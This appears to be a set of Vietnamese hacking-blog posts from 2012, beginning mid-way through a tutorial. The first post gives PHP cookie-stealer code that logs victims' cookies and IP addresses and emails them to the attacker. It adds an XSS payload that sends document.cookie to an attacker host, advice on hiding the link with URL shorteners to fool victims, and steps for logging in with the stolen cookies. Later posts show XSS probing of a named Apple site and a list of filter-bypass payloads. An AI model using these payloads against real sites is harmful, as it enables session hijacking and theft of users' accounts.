$fp = fopen('cookies.html', 'a');
fwrite($fp, 'Cookie: '.$cookie.'<br> IP: ' .$ip. '<br> Date and Time: ' .$date. '<br> Referer: '.$referer.'<br><br><br>');
fclose($fp);
?>

<?php
$cookie = $HTTP_GET_VARS["cookie"];

mail("ducdung.08clc@gmail.com", "Stolen Cookies", $cookie);

?>

// Đoạn mã này có tác dụng gửi cookies về email của attacker
Bước 3: Khai thác lỗ hổng XSS

- Giả sử soleil up 2 file trên lên host của site http://www.vhbgroup.net , thì đoạn mã script ăn cắp cookies có dạng như sau:

<script>location.href = 'http://www.vhbgroup.net/Stealer.php?cookie='+document.cookie;</script>
- Chèn đoạn mã đó vào site dính lỗi XSS là http://www.VulnerableSite.com ta được link tương tự như:

http://www.VulnerableSite.com/index.php?search=<script>location.href='http://www.vhbgroup.net/Stealer.php?cookie='+document.cookie;</script>
Hoặc là chèn đoạn mã sau vào khung search, comment hay textbox nào đó, khi victim view site thì cookies sẽ được gửi về cho attacker

<script>location.href='http://www.vhbgroup.net/Stealer.php?cookie='+document.cookie;</script>
Để đánh lừa được victim thì attacker sẽ làm ngắn đoạn url trên bằng cách sử dụng 1 số link sau:

http://tiny.cc/

http://www.shorturl.com/

http://tinyurl.com/

http://is.gd/

http://ow.ly/url/shorten-url

http://goo.gl/

http://mcaf.ee/

http://www.doiop.com/

https://addons.mozilla.org/vi/firefo...copy-shorturl/

Sau khi đã đánh cắp đươc thông tin cookies của victim, có thể sử dụng tiên ích add-ons cookies manager hoặc live http để login.

Chủ Nhật, 18 tháng 11, 2012

[Tutorial] Tut check XSS locate.apple.com theo phương thức Post


Victim: locate.apple.com

Công cụ: Live HTTP để bắt các request
Bước 1: Vào trang chủ:locate.apple.com



Click chuột vào tab Services, Bật Live HTTP sau đó bắt request


Bước 2:Bật Live HTTP chương trình như sau



Bước 3:Các bạn nhìn thấy request Post trong hình rồi bây giờ click tab header->Để ý vào mục Post-> sau đo click vào Replay để request lại



Bước 4:Để ý trong nội dung Send Post content?. Mình sẽ thêm Script XSS ở đây mình thêm script sau
<script>alert('Check by kakavn_85')</script>  sau vị trí location=



Sai đó ấn nút replay đợi 1 lúc sẽ hiện ra kết quả như sau



End Tut: kakavn_85

Chủ Nhật, 4 tháng 11, 2012

Bypass XSS filters

Bypass XSS filters


Sau buổi tranning H'sM của bạn Mạnh Luật về XSS chúng ta đã thấy được sự nguy hiểm cũng như mức độ phổ biến của XSS -> có nhiều cách để ngăn chặn XSS -> kẻ tấn công cũng sẽ nghĩ ra nhiều kiểu tấn công mới để vượt qua các "bộ lọc".

Đa số các "bộ lọc" sẽ sử dụng cách cơ bản nhất là chặn các thẻ <script></script>.


Chúng ta sẽ cùng xem một số VD sau:

+Sử dụng các thuộc tính của các thẻ html:

<body onload=alert('test1')>

<b onmouseover=alert('Wufff!')>click me!</b>

<img src="http://url.to.file.which/not.exist" onerror=alert(document.cookie);>

+Sử dụng thuộc tính SRC:
<IMG SRC=javascript:alert('XSS')>
<BGSOUND SRC="javascript:alert('XSS');">
Encode nội dung (UTF-8)
<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>

+Sử dụng URI đã được encode base64

<META HTTP-EQUIV="refresh"
CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgndGVzdDMnKTwvc2NyaXB0Pg">

Chú ý: một số code có thể không chạy được trên một số trình duyệt.
Đây chỉ là một ít trong số rất nhiều cách thực thi các đoạn mã javascript
Các bạn có thể tham khảo thêm tại:
http://ha.ckers.org/xss.html

Thân ái,
Việt Nguyễn